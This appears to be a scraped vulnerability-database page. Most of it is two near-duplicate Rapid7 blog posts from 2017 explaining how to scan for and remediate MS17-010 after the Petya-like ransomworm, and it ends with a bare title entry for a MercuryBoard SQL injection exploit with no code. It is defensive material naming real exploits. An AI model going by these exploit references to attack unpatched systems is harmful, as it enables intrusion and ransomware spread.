href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0144</a><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0145</a><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0146</a><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0147</a><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0148</a>5. Save the template and run a scan to identify all assets with MS17-010. <h2 dir=\"ltr\">Creating a Dynamic Asset Group</h2>Now that you have scanned your assets, you may want to create a Dynamic Asset Group for reporting and tagging, which will update whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" rel=\"nofollow\" target=\"_blank\">InsightVM</a> console, just under the search button: <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67245/Screen+Shot+2017-06-27+at+3.55.40+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.55.40 PM.png\" class=\"image-5 jive-image\" height=\"160\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67245/Screen+Shot+2017-06-27+at+3.55.40+PM.png\" style=\"width: auto; height: auto;\" width=\"620\"/></a>Now, use the \"CVE ID\" filter to specify the CVEs listed below:<a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67246/Screen+Shot+2017-06-27+at+3.42.28+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.42.28 PM.png\" class=\"image-6 jive-image\" height=\"457\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67246/Screen+Shot+2017-06-27+at+3.42.28+PM.png\" style=\"width: 620px; height: 385px;\" width=\"736\"/></a>This asset group can now be used for reporting as well as tagging to quickly identify exposed systems. <h2 dir=\"ltr\">Creating a Dashboard</h2>Rapid7 will add a pre-built dashboard for the Petya-like ransomworm, like we did with the recent WannaCry and Samba vulnerabilities. Also, check out the new <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7908\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/06/13/live-threat-driven-prioritization\">Threat Feed dashboard</a> which contains a view of your assets that are affected by actively targeted vulnerabilities including those leveraged by this ransomworm. If you want to build your own, here’s <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\">how you can build a custom dashboard</a>, with examples taken from the Shadow Brokers leak.  To find your exposure to MS17-010 vulnerabilities, you could use this Dashboard filter: asset.vulnerability.alternateIds <=> ( altId = \"MS17-010\" )  <h2 dir=\"ltr\">Creating a SQL Query Export</h2>@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: <a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning & Reporting.</a> <h2 dir=\"ltr\">Creating a Remediation Project</h2>In InsightVM, you can also create a remediation project to track the progress of remediation. To do this, go to the “Projects” tab and click “Create a Project”: <a href=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\"><img class=\"jive-image\" height=\"144\" src=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\" style=\"border-style: none;\" width=\"624\"/></a> Give the project a name, and under vulnerability filter type in vulnerability.alternateIds.altId CONTAINS \"MS17-010\" <a href=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\"><img class=\"jive-image\" height=\"248\" src=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\" style=\"border-style: none;\" width=\"624\"/></a> Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7839\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/08/simple-remediation-collaboration\">JIRA or ServiceNow</a>, you can also configure the automatic ticketing integration between InsightVM and JIRA/ServiceNow to automatically assign tickets to the right folks. Using these steps, you’ll be able to quickly scan for some of the vulnerabilities leveraged by this ransomworm. If you have any questions please don’t hesitate to let us know! For more information and resources on this ransomworm, <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar\" target=\"_blank\">please visit this page</a>.</div>", "modified": "2017-08-03T16:56:04", "published": "2017-08-03T16:56:04", "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/28/petya-like-ransomworm-leveraging-insightvm-and-nexpose-for-visibility-into-ms17-010", "id": "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "title": "Petya-like ransomworm: Leveraging InsightVM and Nexpose for visibility into MS17-010", "type": "rapid7community", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-28T03:17:01", "bulletinFamily": "blog", "description": "<div class=\"jive-rendered-content\">A Petya-like ransomworm struck on June 27th 2017 and spread throughout the day, affecting organizations in several european countries and the US. It is believed that the ransomworm may achieve its initial infection via a malicious document attached to a phishing email, and then leverages the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\">EternalBlue </a>and <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar%2F\" target=\"_blank\">DoublePulsar </a>exploits to spread laterally. Once in place, it takes control of a system and encrypts files. As a reminder, ExternalBlue was leveraged for <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">WannaCry</a> as well, so we cannot stress enough the importance of patching against MS17-010 vulnerabilities.  For the latest updates on this ransomworm, please see Rapid7’s <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fpetya%2F\" target=\"_blank\">recommended actions</a>. To help customers understand their risk, we are sharing steps to create a targeted scan, dynamic asset group, and remediation project for identifying and fixing vulnerabilities; we will update as more information becomes available on other CVEs that may be used to spread the worm. As always, you can contact Rapid7 Support and your CSM with any questions, and if you haven’t done so already, <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\">download a trial of InsightVM here</a>. <h2 dir=\"ltr\">Creating a Scan Template</h2>The step-by-step guide to create an InsightVM/Nexpose scan template specifically to look for MS17-010 is as follows:1.  Under the Administration tab, go to Templates > Manage Templates <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67229/Admin-ManageTemplates.gif\"><img alt=\"Admin-ManageTemplates.gif\" class=\"image-1 jive-image\" height=\"687\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67229/Admin-ManageTemplates.gif\" style=\"width: 620px; height: 298px;\" width=\"1430\"/></a>  2. Copy the following template: Full Audit without Web Spider. Don't forget to give your copy a name and description. <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67230/Admin-CopyScantemplate.gif\"><img alt=\"Admin-CopyScantemplate.gif\" class=\"image-2 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67230/Admin-CopyScantemplate.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a> 3. First uncheck \"Policies\". Click on Vulnerability Checks and then \"By Individual Checks\" <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67231/Admin-ByIndividualCheck.gif\"><img alt=\"Admin-ByIndividualCheck.gif\" class=\"image-3 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67231/Admin-ByIndividualCheck.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a> 4. Add Check “<a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" rel=\"nofollow\" target=\"_blank\">MS17-010</a>” and click Save: <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67232/Scantemplate-ms17-010.gif\"><img alt=\"Scantemplate-ms17-010.gif\" class=\"image-4 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67232/Scantemplate-ms17-010.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a> This should return checks that are related to MS17-010. The related CVEs are:<a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0143</a><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0144</a><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0145</a><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0146</a><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0147</a><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0148</a>5. Save the template and run a scan to identify all assets with MS17-010. <h2 dir=\"ltr\">Creating a Dynamic Asset Group</h2>Now that you have scanned your assets, you may want to create a Dynamic Asset Group for reporting and tagging, which will update whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" rel=\"nofollow\" target=\"_blank\">InsightVM</a> console, just under the search button: <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67235/Screen+Shot+2017-06-27+at+3.55.40+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.55.40 PM.png\" class=\"image-5 jive-image\" height=\"160\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67235/Screen+Shot+2017-06-27+at+3.55.40+PM.png\" style=\"width: auto; height: auto;\" width=\"620\"/></a>Now, use the \"CVE ID\" filter to specify the CVEs listed below: <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67236/Screen+Shot+2017-06-27+at+3.42.28+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.42.28 PM.png\" class=\"image-6 jive-image\" height=\"457\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67236/Screen+Shot+2017-06-27+at+3.42.28+PM.png\" style=\"width: 620px; height: 385px;\" width=\"736\"/></a>This asset group can now be used for reporting as well as tagging to quickly identify exposed systems. <h2 dir=\"ltr\">Creating a Dashboard</h2>Rapid7 will add a pre-built dashboard for the Petya-like ransomworm, like we did with the recent WannaCry and Samba vulnerabilities.  Also, check out the new <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7908\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/06/13/live-threat-driven-prioritization\">Threat Feed dashboard</a> which contains a view of your assets that are affected by actively targeted vulnerabilities including those leveraged by this ransomworm. If you want to build your own, here’s <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\">how you can build a custom dashboard</a>, with examples taken from the Shadow Brokers leak.  To find your exposure to MS17-010 vulnerabilities, you could use this Dashboard filter: asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR asset.vulnerability.title CONTAINS \"cve-2017-0146\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\" <h2 dir=\"ltr\">Creating a SQL Query Export</h2>@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: <a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning & Reporting.</a> <h2 dir=\"ltr\">Creating a Remediation Project</h2>In InsightVM, you can also create a remediation project to track the progress of remediation. To do this, go to the “Projects” tab and click “Create a Project”: <a href=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\"><img class=\"jive-image\" height=\"144\" src=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\" style=\"border-style: none;\" width=\"624\"/></a> Give the project a name, and under vulnerability filter type in vulnerability.alternateIds.altId CONTAINS \"MS17-010\" <a href=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\"><img class=\"jive-image\" height=\"248\" src=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\" style=\"border-style: none;\" width=\"624\"/></a> Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7839\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/08/simple-remediation-collaboration\">JIRA or ServiceNow</a>, you can also configure the automatic ticketing integration between InsightVM and JIRA/ServiceNow to automatically assign tickets to the right folks. Using these steps, you’ll be able to quickly scan for the vulnerabilities leveraged by this ransomworm. If you have any questions please don’t hesitate to let us know! For more information and resources on this ransomworm, <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar\" target=\"_blank\">please visit this page</a>.</div>", "modified": "2017-06-28T00:06:12", "published": "2017-06-28T00:06:12", "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/28/protecting-against-petya-like-ransom-worm-with-insightvm-and-nexpose", "id": "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "title": "Petya-like ransomworm: Leveraging InsightVM and Nexpose for visibility into MS17-010", "type": "rapid7community", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}

MercuryBoard &lt;= 1.1.4 (User-Agent) Remote SQL Injection Exploit

Description

Exploit for unknown platform in category web applications

MercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit